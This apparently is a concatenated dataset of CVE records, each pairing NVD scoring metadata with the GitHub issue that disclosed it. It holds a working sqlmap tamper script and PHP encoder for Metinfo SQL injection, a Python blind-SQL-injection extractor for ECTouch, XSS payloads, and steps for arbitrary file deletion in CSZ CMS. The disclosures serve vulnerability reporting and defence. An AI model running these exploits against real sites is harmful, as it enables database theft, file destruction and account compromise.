![15491922026893](https://user-images.githubusercontent.com/32212303/52681414-a9a01d80-2f76-11e9-9d3d-6c5b9476e750.jpg) sqlmap tamper ``` #!/usr/bin/env python """ Metinfo V6.1.3 Only-wait """ from lib.core.enums import PRIORITY from sys import argv import urllib2 __priority__ = PRIORITY.LOWEST api_url = "http://localhost:8081/sqli.php?key=#1&encodestr=#2" key_name = "/config/config_safe.php" def dependencies(): pass def tamper(payload, **kwargs): global api_url url = argv[2].replace("/member/basic.php?a=dosafety_emailadd&p=*","") send_key(url) res = request(api_url.replace("#2",urllib2.quote("a.com' or username='tete'"+payload))) if res["code"] == 200: return res["text"] def send_key(url): global api_url,key_name res = request(url+key_name) if(res["code"] == 200): if(len(res["text"])>0): api_url = api_url.replace("#1",res["text"].replace("<?php/*","").replace("*/?>","")) else: print "[-] URL can not be used. " exit() def request(url): request = urllib2.Request(url) request.add_header('Content-Type', 'application/x-www-form-urlencoded') response = urllib2.urlopen(request) return {"code":response.getcode(),"text":response.read()} ``` Encode script(`sqli.php` in sqlmap tamper): ``` <?php //作为api,方便调用,over class auth { public $auth_key; public function __construct($key) { $this->auth_key = $key; } public function decode($str, $key = ''){ return $this->authcode($str, 'DECODE', $this->auth_key.$key); } public function encode($str, $key = '', $time = 0){ return $this->authcode($str, 'ENCODE', $this->auth_key.$key, $time); } public function creatkey($length = '10'){ $str="A2B3C4zD5yE6xF7wG8vH9uitJsKrLnMmNlPkQjRiShTgUfVeWdXcYbZa"; $result=""; for($i=0;$i<$length;$i++){ $num[$i]=rand(0,25); $result.=$str[$num[$i]]; } return $result; } public function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){ $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } }else{ return $keyc.str_replace('=', '', base64_encode($result)); } } } //POC:"aaa@aa.com' or username='tete' and if(length(user())>=10,sleep(5),0);#" if(isset($_REQUEST["key"]) && !empty($_REQUEST["key"])) { $auth = new auth($_REQUEST["key"]); } else { exit("[-] Please input key."); } if(isset($_REQUEST["encodestr"]) && !empty($_REQUEST["encodestr"])) { // var_dump($auth->encode("aaa@aa.com' or username='tete' and if(length(user())>=10,sleep(5),0);#")); // var_dump(urldecode($_REQUEST["encodestr"])); exit($auth->encode(urldecode($_REQUEST["encodestr"]))); } else { exit("[-] Please enter encrypted string."); } ?> ``` Then run command ``` sqlmap.py -u "http://target.com/member/basic.php?a=dosafety_emailadd&p=*" --cookie "tete's cookie" --tamper "Metinfo.py" --dbms "mysql" --technique "T" ``` ![15495360922886](https://user-images.githubusercontent.com/32212303/52681508-056aa680-2f77-11e9-9415-11c23a6906f3.jpg) (Please register a member with user name "tete" by yourself or modify the script)
There is a SQL inject vulnerability(limited by PHP-ts)
https://api.github.com/repos/291237388/metinfo/issues/1/comments
0
2019-02-13T02:09:52Z
2019-02-13T02:09:52Z
https://github.com/291237388/metinfo/issues/1
409,589,970
1
2,247
CVE-2020-19118
2021-07-30T14:15:13.497
Cross Site Scripting (XSS) vulnerabiity in YzmCMS 5.2 via the site_code parameter in admin/index/init.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.2:*:*:*:*:*:*:*", "matchCriteriaId": "D2E1FE25-3E00-4952-8D4F-A4943757C803", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/14
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Because the data inputed by the user is not effectively filtered, so that attackers can inject javascript code into the HTML page for execution. Anyone who clicks on the page will trigger it The stored XXS vulnerability exists the admin/index/init.html POC: <script>alert('XSS!')</script> ![T96%(B16_4XO}A{9J}0D@4](https://user-images.githubusercontent.com/19670854/56663954-cde84b00-66d9-11e9-9884-a53a9562a4ff.png) ![1)2B4E35T _){J%__F}4HN9](https://user-images.githubusercontent.com/19670854/56663631-223efb00-66d9-11e9-8505-7468635706c0.png) Fix:Filter the site_code parameter
Stored XSS vulnerability in yzmcms v5.2
https://api.github.com/repos/yzmcms/yzmcms/issues/14/comments
0
2019-04-24T13:37:50Z
2019-04-24T13:42:17Z
https://github.com/yzmcms/yzmcms/issues/14
436,702,447
14
2,248
CVE-2020-21806
2021-07-30T14:15:13.643
SQL Injection Vulnerability in ECTouch v2 via the shop page in index.php..
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ectouch/ectouch/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ectouch/ectouch/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "3FCDB201-E6E3-4D1A-A480-6564C10A74A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ectouch/ectouch/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ectouch", "ectouch" ]
#Order:zionlab@dbappsecurity.com.cn ##poc: import requests import re,string import urllib.parse def get_database_length(): param={} url="http://localhost/ectouch-master/index.php?m=default&c=flow&a=add_to_cart" payload_len = '"-1 or length(database())={0} -- a"' goods='{"quick":1,"spec":[""],"goods_id":hack,"number":"1","parent":0}' i = 1 while i<10: payload_len_i = payload_len.format(i) goods_i=goods.replace("hack",payload_len_i) goods_i = urllib.parse.quote(goods_i) param['goods'] = goods_i #print(param) r = requests.post(url,data=param) if "cart_number" in r.text: print("len:",i) return i i += 1 def get_database(len): param={} database_name="" url="http://localhost/ectouch-master/index.php?m=default&c=flow&a=add_to_cart" payload_database = '"-1 or ord(substr(database(),{0},1))={1} -- a"' goods='{"quick":1,"spec":[""],"goods_id":hack,"number":"1","parent":0}' chr_str = string.ascii_lowercase + string.digits + string.punctuation for i in range(len): for j in chr_str: payload_database_i=payload_database.format((i+1),ord(j)) goods_i=goods.replace("hack",payload_database_i) goods_i = urllib.parse.quote(goods_i) param['goods'] = goods_i r = requests.post(url,data=param) if "cart_number" in r.text: database_name+=j print("database_name:",database_name) len=get_length() get_database(len)
SQL Injection vulnerability
https://api.github.com/repos/ectouch/ectouch/issues/5/comments
0
2020-01-04T06:27:04Z
2021-01-06T05:55:43Z
https://github.com/ectouch/ectouch/issues/5
545,248,457
5
2,249
CVE-2020-21854
2021-07-30T14:15:13.730
Cross Site Scripting vulnerabiity exists in WDScanner 1.1 in the system management page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TideSec/WDScanner/issues/41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TideSec/WDScanner/issues/41" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tidesec:wdscanner:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "AC42E191-B881-4421-9E7B-758872AC0EFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/TideSec/WDScanner/issues/41
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "TideSec", "WDScanner" ]
Hello, I found XSS vulnerability in the system management page。 <img width="783" alt="1" src="https://user-images.githubusercontent.com/27681113/71954440-3fdcd200-3220-11ea-8182-9e61ea246b98.png"> This is the payload When I tested: page:index.php Param:c=new&m=set ParamKey:mail POSTData: group=0&mail=<img src=1 onerror=alert(1)>&passwd=g00dPa%24%24w0rD&phone=555-666-0606&status=1&username=GRLpGpAGa <img width="635" alt="2" src="https://user-images.githubusercontent.com/27681113/71954548-a104a580-3220-11ea-9b58-cce1761fa039.png">
XSS vulnerability in system management page
https://api.github.com/repos/TideSec/WDScanner/issues/41/comments
1
2020-01-08T06:10:40Z
2020-03-05T14:15:47Z
https://github.com/TideSec/WDScanner/issues/41
546,664,968
41
2,250
CVE-2020-22761
2021-07-30T14:15:13.757
Cross Site Request Forgery (CSRF) vulnerability in FlatPress 1.1 via the DeleteFile function in flat/admin.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flatpressblog/flatpress/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://www.baomatcoban.info/2020/04/funnymini0day-flatpress-11-cross-site.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flatpressblog/flatpress/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://www.baomatcoban.info/2020/04/funnymini0day-flatpress-11-cross-site.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flatpress:flatpress:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C429E13D-D33C-49B8-B615-2111FC68A1E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/flatpressblog/flatpress/issues/64
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flatpressblog", "flatpress" ]
In the source code, the DeleteFile function is sent via unauthenticated GET method. (fp-plugins\mediamanager\tpls\admin.plugin.mediamanager.files.tpl <td> <a class="link-delete" href="{$mmbaseurl}&deletefile={$v.type}-{$v.name}">{$plang.delete}</a> </td> The application does not have anti-csrf tokens, so it is vulnerable to Cross-site Request Forgery attacks. The vulnerability allows delete any file.
Security Issue: CSRF in DeleteFile function. [bug]
https://api.github.com/repos/flatpressblog/flatpress/issues/64/comments
7
2020-04-19T13:44:03Z
2022-12-30T11:53:26Z
https://github.com/flatpressblog/flatpress/issues/64
602,718,274
64
2,251
CVE-2021-36605
2021-07-30T14:15:18.173
engineercms 1.03 is vulnerable to Cross Site Scripting (XSS). There is no escaping in the nickname field on the user list page. When viewing this page, the JavaScript code will be executed in the user's browser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/3xxx/engineercms/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/3xxx/engineercms/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:engineercms_project:engineercms:1.03:*:*:*:*:*:*:*", "matchCriteriaId": "D500A28E-C1A4-40B7-A151-3625915833AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/3xxx/engineercms/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "3xxx", "engineercms" ]
### Description There is no escaping in the nickname field on the user list page,When viewing this page, the JavaScript code will be executed in the user's browser. ### Impact Version v1.03 ### Steps to Reproduce 1、Visit the profile page after logging in,`http://xxx/user` 2、Click on the nickname and insert the javascript code,`test<img/src=x onerror=alert(1)>` 3、Click save, the payload has been executed ![image](https://user-images.githubusercontent.com/45651912/124614852-44cb2200-dea7-11eb-99b1-fbb060ea9939.png) The original request is as follows: ``` POST /admin/user/updateuser name=Nickname&value=test%3Cimg%2Fsrc%3Dx+onerror%3Dalert(1)%3E&pk=300 ```
"Nickname" has a stored XSS vulnerability
https://api.github.com/repos/3xxx/engineercms/issues/52/comments
2
2021-07-06T14:16:22Z
2021-07-10T16:38:08Z
https://github.com/3xxx/engineercms/issues/52
937,946,676
52
2,252
CVE-2021-37144
2021-07-30T14:15:18.340
CSZ CMS 1.2.9 is vulnerable to Arbitrary File Deletion. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "0068F78B-C701-4A09-8978-A0D07EE14906", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "706" ]
706
https://github.com/cskaza/cszcms/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
**Vulnerability Name:** Multiple Arbitrary File Deletion **Date of Discovery:** 20 July 2021 **Product version:** 1.2.9 [Download link](https://sourceforge.net/projects/cszcms/files/) **Author:** faisalfs10x **Vulnerability Description:** When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. --- **Proof of Concept 1** **Vulnerable URL:** http://localhost/CSZCMS-V1.2.9/member/edit/save **Vulnerable Code:** line 2141 - cszcms\models\Csz_model.php ![image](https://user-images.githubusercontent.com/51811615/128048992-47fcd03a-5af7-47df-aece-860ff643829c.png) **Steps to Reproduce:** 1. Login as member 2. Goto Edit Profile 3. Upload any image as profile picture and click save button - refresh 4. Click "Delete File" checkbox and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file". ![image](https://user-images.githubusercontent.com/51811615/127955670-9323ef0b-2057-4bc3-a219-abba98672ca0.png) --- **Proof of Concept 2** **Vulnerable URL:** http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave **Vulnerable Code:** line 116, 131 - cszcms\models\plugin\Article_model.php ![image](https://user-images.githubusercontent.com/51811615/128049045-25a2c3ed-7670-4687-bc71-ac0d647960de.png) **Steps to Reproduce:** 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" ![image](https://user-images.githubusercontent.com/51811615/127955902-58f94966-dba4-42de-b12d-380ebaa4992d.png) --- **Proof of Concept 3** **Vulnerable URL:** http://localhost/CSZCMS-V1.2.9/admin/settings/update **Vulnerable Code:** line 944, 958 - cszcms\models\Csz_admin_model.php ![image](https://user-images.githubusercontent.com/51811615/126389724-e226072a-fa7e-43f8-b90b-ec66d1cb91fb.png) **Step to Reproduce:** 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" ![image](https://user-images.githubusercontent.com/51811615/126390075-15c1d673-278d-4384-9351-8443cec86e10.png) Thanks. cc:@cskaza
Bug Report: Multiple Arbitrary File Deletion vulnerabilities
https://api.github.com/repos/cskaza/cszcms/issues/32/comments
1
2021-07-20T20:33:42Z
2021-11-10T03:52:03Z
https://github.com/cskaza/cszcms/issues/32
949,061,638
32
2,253
CVE-2021-37587
2021-07-30T14:15:18.543
In Charm 0.43, any single user can decrypt DAC-MACS or MA-ABE-YJ14 data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://eprint.iacr.org/2020/460" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JHUISI/charm/issues/276" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://jhuisi.github.io/charm/_modules/abenc_maabe_yj14.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://jhuisi.github.io/charm/charm/schemes/abenc/abenc_dacmacs_yj14.html" }, { "source": "cve@mitre.org", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://www2.hci.uni-hannover.de/papers/Tan2019.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://eprint.iacr.org/2020/460" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JHUISI/charm/issues/276" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://jhuisi.github.io/charm/_modules/abenc_maabe_yj14.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://jhuisi.github.io/charm/charm/schemes/abenc/abenc_dacmacs_yj14.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://www2.hci.uni-hannover.de/papers/Tan2019.pdf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jhu:charm:0.43:*:*:*:*:*:*:*", "matchCriteriaId": "86DDEE36-0E69-4143-ADE7-3B1AE20B9631", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "327" ]
327
https://github.com/JHUISI/charm/issues/276
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JHUISI", "charm" ]
Hello, At CT-RSA 2021 Venema and Alpar presented attacks against 11 ABE schemes and two of them are implemented in the last version of CHARM: DAC-MACS and MA-ABE-YJ14: - https://jhuisi.github.io/charm/charm/schemes/abenc/abenc_dacmacs_yj14.html - https://jhuisi.github.io/charm/_modules/abenc_maabe_yj14.html Moreover, the YCT14 scheme was broken in 2019 and is also implemented in CHARM: https://github.com/JHUISI/charm/blob/dev/charm/schemes/abenc/abenc_yct14.py It is possible to mount decryption attacks against them. References: https://eprint.iacr.org/2020/460 https://www2.hci.uni-hannover.de/papers/Tan2019.pdf
Broken schemes in last release
https://api.github.com/repos/JHUISI/charm/issues/276/comments
0
2021-07-21T14:01:46Z
2021-07-21T14:02:34Z
https://github.com/JHUISI/charm/issues/276
949,741,135
276
2,254
CVE-2021-37593
2021-07-30T14:15:18.617
PEEL Shopping version 9.4.0 allows remote SQL injection. A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands. Upon a successful SQL injection attack, an attacker can read sensitive data from the database and possibly modify database data.
